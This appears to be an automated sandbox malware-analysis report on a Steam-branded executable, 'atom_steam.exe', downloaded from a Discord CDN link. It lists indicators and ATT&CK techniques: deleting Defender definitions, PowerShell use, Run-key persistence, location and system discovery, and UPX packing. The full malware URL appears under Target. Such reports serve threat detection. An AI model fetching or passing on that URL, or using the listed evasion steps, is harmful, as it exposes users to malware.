hxxps://cdn[.]discordapp[.]com/attachments/1299809565474422835/1300047698639982665/atom_steam[.]exe?ex=671f6b45&is=671e19c5&hm=901397100971fbbb6cec69b8a7ec49e8d41db2bc42a32bce050ffd09076ecffe&

Analysis

max time kernel
209s
max time network
213s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
27-10-2024 10:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1299809565474422835/1300047698639982665/atom_steam.exe?ex=671f6b45&is=671e19c5&hm=901397100971fbbb6cec69b8a7ec49e8d41db2bc42a32bce050ffd09076ecffe&

Score

10^/10

steam discovery evasion execution persistence phishing upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Processes:

MpCmdRun.exe

pid process

5384 MpCmdRun.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

5492 powershell.exe
4508 powershell.exe
Downloads MZ/PE file

pid	process
5384	MpCmdRun.exe

pid	process
5492	powershell.exe
4508	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

steamwebhelper.exesteamwebhelper.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation	steamwebhelper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation	steamwebhelper.exe

Executes dropped EXE 16 IoCs

Processes:

atom_steam.exeatom_steam.exeSteamSetup.exesteamservice.exesteam.exesteam.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exegldriverquery64.exesteamwebhelper.exesteamwebhelper.exegldriverquery.exevulkandriverquery64.exevulkandriverquery.exe

pid	process
4648	atom_steam.exe
5556	atom_steam.exe
5724	SteamSetup.exe
5280	steamservice.exe
5504	steam.exe
15880	steam.exe
15932	steamwebhelper.exe
15968	steamwebhelper.exe
16092	steamwebhelper.exe
16200	steamwebhelper.exe
12912	gldriverquery64.exe
10368	steamwebhelper.exe
13336	steamwebhelper.exe
13940	gldriverquery.exe
14028	vulkandriverquery64.exe
16404	vulkandriverquery.exe

Loads dropped DLL 64 IoCs

Processes:

atom_steam.exeSteamSetup.exesteam.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exesteamwebhelper.exe

pid	process
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5556	atom_steam.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15932	steamwebhelper.exe
15968	steamwebhelper.exe
15968	steamwebhelper.exe
15968	steamwebhelper.exe
16092	steamwebhelper.exe
16092	steamwebhelper.exe
15880	steam.exe
16092	steamwebhelper.exe
16092	steamwebhelper.exe
16092	steamwebhelper.exe
16092	steamwebhelper.exe
16092	steamwebhelper.exe
15880	steam.exe
16200	steamwebhelper.exe
16200	steamwebhelper.exe
16200	steamwebhelper.exe
15880	steam.exe
10368	steamwebhelper.exe
10368	steamwebhelper.exe
10368	steamwebhelper.exe
13336	steamwebhelper.exe
13336	steamwebhelper.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SteamSetup.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -silent"	SteamSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

56 ip-api.com
Detected potential entity reuse from brand STEAM.
phishing steam
Enumerates processes with tasklist 1 TTPs 1 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4600 tasklist.exe

flow	ioc
56	ip-api.com

pid	process
4600	tasklist.exe

UPX packed file 49 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI46482\python310.dll	upx
behavioral1/memory/5556-248-0x00007FFBA7C80000-0x00007FFBA80EE000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\select.pyd	upx
behavioral1/memory/5556-277-0x00007FFBBAB70000-0x00007FFBBAB9D000-memory.dmp	upx
behavioral1/memory/5556-279-0x00007FFBBBA20000-0x00007FFBBBA39000-memory.dmp	upx
behavioral1/memory/5556-281-0x00007FFBB9D30000-0x00007FFBB9D4F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\libssl-1_1.dll	upx
behavioral1/memory/5556-283-0x00007FFBA9730000-0x00007FFBA98A1000-memory.dmp	upx
behavioral1/memory/5556-285-0x00007FFBB7640000-0x00007FFBB7659000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI46482\libcrypto-1_1.dll	upx
behavioral1/memory/5556-255-0x00007FFBC05F0000-0x00007FFBC05FF000-memory.dmp	upx
behavioral1/memory/5556-287-0x00007FFBBC600000-0x00007FFBBC60D000-memory.dmp	upx
behavioral1/memory/5556-295-0x00007FFBA8A20000-0x00007FFBA8AD8000-memory.dmp	upx
behavioral1/memory/5556-294-0x00007FFBA7900000-0x00007FFBA7C75000-memory.dmp	upx
behavioral1/memory/5556-304-0x00007FFBA8900000-0x00007FFBA8A18000-memory.dmp	upx
behavioral1/memory/5556-303-0x00007FFBBAB70000-0x00007FFBBAB9D000-memory.dmp	upx
behavioral1/memory/5556-301-0x00007FFBBB800000-0x00007FFBBB80D000-memory.dmp	upx
behavioral1/memory/5556-299-0x00007FFBB7620000-0x00007FFBB7634000-memory.dmp	upx
behavioral1/memory/5556-298-0x00007FFBBBA40000-0x00007FFBBBA64000-memory.dmp	upx
behavioral1/memory/5556-293-0x00007FFBA7C80000-0x00007FFBA80EE000-memory.dmp	upx
behavioral1/memory/5556-290-0x00007FFBAC750000-0x00007FFBAC77E000-memory.dmp	upx
behavioral1/memory/5556-253-0x00007FFBBBA40000-0x00007FFBBBA64000-memory.dmp	upx
behavioral1/memory/5556-347-0x00007FFBBB800000-0x00007FFBBB80D000-memory.dmp	upx
behavioral1/memory/5556-359-0x00007FFBB7620000-0x00007FFBB7634000-memory.dmp	upx
behavioral1/memory/5556-358-0x00007FFBAC750000-0x00007FFBAC77E000-memory.dmp	upx
behavioral1/memory/5556-357-0x00007FFBBC600000-0x00007FFBBC60D000-memory.dmp	upx
behavioral1/memory/5556-356-0x00007FFBB7640000-0x00007FFBB7659000-memory.dmp	upx
behavioral1/memory/5556-355-0x00007FFBA9730000-0x00007FFBA98A1000-memory.dmp	upx
behavioral1/memory/5556-354-0x00007FFBB9D30000-0x00007FFBB9D4F000-memory.dmp	upx
behavioral1/memory/5556-353-0x00007FFBBBA20000-0x00007FFBBBA39000-memory.dmp	upx
behavioral1/memory/5556-352-0x00007FFBBAB70000-0x00007FFBBAB9D000-memory.dmp	upx
behavioral1/memory/5556-351-0x00007FFBC05F0000-0x00007FFBC05FF000-memory.dmp	upx
behavioral1/memory/5556-350-0x00007FFBBBA40000-0x00007FFBBBA64000-memory.dmp	upx
behavioral1/memory/5556-349-0x00007FFBA8A20000-0x00007FFBA8AD8000-memory.dmp	upx
behavioral1/memory/5556-348-0x00007FFBA8900000-0x00007FFBA8A18000-memory.dmp	upx
behavioral1/memory/5556-345-0x00007FFBA7900000-0x00007FFBA7C75000-memory.dmp	upx
behavioral1/memory/5556-334-0x00007FFBA7C80000-0x00007FFBA80EE000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

Processes:

steam.exe

description	ioc	process
File created	C:\Program Files (x86)\Steam\package\tmp\steamui\images\osk2.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\broadcast\broadcast_live_grey.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\shared_outlined_button_a_sm.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\switchpro_lstick_click_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\ps_button_square_sm.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\sd_r1_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\switchpro_lstick_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\switchpro_lstick_right_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\tenfoot\resource\images\library\controller\binding_icons\ghost_030_inv_0110.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\public\steam_tray.tga_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\ps4_trackpad_down.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sd_rtrackpad_ring.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\switchpro_rstick_down.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\steamui\localization\friendsui_vietnamese-json.js_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\keybg.tga_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\public\steamclean_german.txt_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\shared_dpad_right.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sc_dpad_down_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\ps5_trackpad_down_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\public\url_list.txt_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\[email protected]_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\localization\dualshock_4_vietnamese.txt_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\ps_color_button_circle_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sc_touchpad_left.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\ps_color_outlined_button_square_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\friends\ChatInviteNotification.res_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\resource\filter_banned_finnish.txt.gz_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\steamui\images\controller\ghost_070_setting_0040.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\osx_close_def.tga_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\localization\switch_controller_romanian.txt_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\ps5_trackpad_l_right_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\shared_rstick_right_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\joyconpair_left_sr_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sd_ltrackpad_click.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\shared_button_y_sm-1.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\[email protected]_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\steam\cached\icon_button_forward_down_sm.tga_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\ps4_trackpad_ring.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sd_ltrackpad_down_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\ps5_trackpad_r_right.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\sc_lt_soft_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\shared_gyro_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\light\switchpro_rstick_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\steam\cached\DialogCheckForUpdates_Expanded.res_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\public\steamclean_swedish.txt_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\joyconpair_right_sr_sm.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\ps_color_outlined_button_x_sm.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\switchpro_r_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\public\ssa\ssa_bigpicture.css_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\resource\filter_clean_japanese.txt.gz_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\bin\cef\cef.win7x64\api-ms-win-eventing-provider-l1-1-0.dll_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\tenfoot\resource\images\library\controller\binding_icons\ghost_030_inv_0321.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\tenfoot\resource\images\library\controller\binding_icons\ghost_090_media_0190.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\steamui\images\controller\ghost_070_setting_0030.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\graphics\minithrobber09.tga_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\shared_mouse_r_click.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\switchpro_rstick_md.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\ps_color_button_x_sm.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\knockout\sc_rt_lg.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\tenfoot\resource\images\library\controller\binding_icons\ghost_040_act_0310.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\tenfoot\resource\images\library\controller\binding_icons\ghost_080_input_0135.png_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\controller_base\images\api\dark\shared_color_outlined_button_y.svg_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\resource\filter_banned_greek.txt.gz_	steam.exe
File created	C:\Program Files (x86)\Steam\package\tmp\resource\layout\gamespage_details_achievements.layout_	steam.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

SteamSetup.exesteamservice.exesteam.exesteam.exegldriverquery.exevulkandriverquery.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SteamSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamservice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steam.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gldriverquery.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vulkandriverquery.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

steam.exesteam.exesteamwebhelper.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	steam.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	steam.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	steam.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	steam.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	steamwebhelper.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	steamwebhelper.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	steam.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 41 IoCs

Processes:

steamservice.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\steam\Shell\Open\Command	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\ = "URL:steam protocol"	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\DefaultIcon\ = "steam.exe"	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\""	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\URL Protocol	steamservice.exe
Key created	\REGISTRY\MACHINE\Software\Classes\steamlink\Shell\Open\Command	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\DefaultIcon\ = "steam.exe"	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\Shell\Open	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\URL Protocol	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\Shell\Open\Command	steamservice.exe
Key created	\REGISTRY\MACHINE\Software\Classes\steam\DefaultIcon	steamservice.exe
Key created	\REGISTRY\MACHINE\Software\Classes\steamlink	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open\Command	steamservice.exe
Key created	\REGISTRY\MACHINE\Software\Classes\steam	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steam	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\Shell\Open	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\DefaultIcon	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\Shell	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\""	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\ = "URL:steamlink protocol"	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\ = "URL:steam protocol"	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\""	steamservice.exe
Key created	\REGISTRY\MACHINE\Software\Classes\steamlink\DefaultIcon	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink\Shell	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\""	steamservice.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\URL Protocol	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\ = "URL:steamlink protocol"	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\URL Protocol	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\DefaultIcon\ = "steam.exe"	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\DefaultIcon	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steam\Shell\Open\Command	steamservice.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\DefaultIcon\ = "steam.exe"	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open	steamservice.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open\Command	steamservice.exe
Key created	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000_Classes\steamlink	steamservice.exe

NTFS ADS 2 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 173223.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 668161.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exeWMIC.exepowershell.exepowershell.exemsedge.exemsedge.exeSteamSetup.exesteam.exe

pid	process
2028	msedge.exe
2028	msedge.exe
5744	msedge.exe
5744	msedge.exe
1976	identity_helper.exe
1976	identity_helper.exe
4228	msedge.exe
4228	msedge.exe
5288	WMIC.exe
5288	WMIC.exe
5288	WMIC.exe
5288	WMIC.exe
5492	powershell.exe
5492	powershell.exe
4508	powershell.exe
4508	powershell.exe
5492	powershell.exe
4508	powershell.exe
1136	msedge.exe
1136	msedge.exe
1136	msedge.exe
1136	msedge.exe
5404	msedge.exe
5404	msedge.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
5724	SteamSetup.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe
15880	steam.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

steam.exe

pid process

15880 steam.exe

pid	process
15880	steam.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

msedge.exe

pid	process
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe
5744	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetasklist.exepowershell.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	5288	WMIC.exe
Token: SeSecurityPrivilege	5288	WMIC.exe
Token: SeTakeOwnershipPrivilege	5288	WMIC.exe
Token: SeLoadDriverPrivilege	5288	WMIC.exe
Token: SeSystemProfilePrivilege	5288	WMIC.exe
Token: SeSystemtimePrivilege	5288	WMIC.exe
Token: SeProfSingleProcessPrivilege	5288	WMIC.exe
Token: SeIncBasePriorityPrivilege	5288	WMIC.exe
Token: SeCreatePagefilePrivilege	5288	WMIC.exe
Token: SeBackupPrivilege	5288	WMIC.exe
Token: SeRestorePrivilege	5288	WMIC.exe
Token: SeShutdownPrivilege	5288	WMIC.exe
Token: SeDebugPrivilege	5288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5288	WMIC.exe
Token: SeRemoteShutdownPrivilege	5288	WMIC.exe
Token: SeUndockPrivilege	5288	WMIC.exe
Token: SeManageVolumePrivilege	5288	WMIC.exe
Token: 33	5288	WMIC.exe
Token: 34	5288	WMIC.exe
Token: 35	5288	WMIC.exe
Token: 36	5288	WMIC.exe
Token: SeDebugPrivilege	4600	tasklist.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeIncreaseQuotaPrivilege	5288	WMIC.exe
Token: SeSecurityPrivilege	5288	WMIC.exe
Token: SeTakeOwnershipPrivilege	5288	WMIC.exe
Token: SeLoadDriverPrivilege	5288	WMIC.exe
Token: SeSystemProfilePrivilege	5288	WMIC.exe
Token: SeSystemtimePrivilege	5288	WMIC.exe
Token: SeProfSingleProcessPrivilege	5288	WMIC.exe
Token: SeIncBasePriorityPrivilege	5288	WMIC.exe
Token: SeCreatePagefilePrivilege	5288	WMIC.exe
Token: SeBackupPrivilege	5288	WMIC.exe
Token: SeRestorePrivilege	5288	WMIC.exe
Token: SeShutdownPrivilege	5288	WMIC.exe
Token: SeDebugPrivilege	5288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5288	WMIC.exe
Token: SeRemoteShutdownPrivilege	5288	WMIC.exe
Token: SeUndockPrivilege	5288	WMIC.exe
Token: SeManageVolumePrivilege	5288	WMIC.exe
Token: 33	5288	WMIC.exe
Token: 34	5288	WMIC.exe
Token: 35	5288	WMIC.exe
Token: 36	5288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4508	powershell.exe
Token: SeSecurityPrivilege	4508	powershell.exe
Token: SeTakeOwnershipPrivilege	4508	powershell.exe
Token: SeLoadDriverPrivilege	4508	powershell.exe
Token: SeSystemProfilePrivilege	4508	powershell.exe
Token: SeSystemtimePrivilege	4508	powershell.exe
Token: SeProfSingleProcessPrivilege	4508	powershell.exe
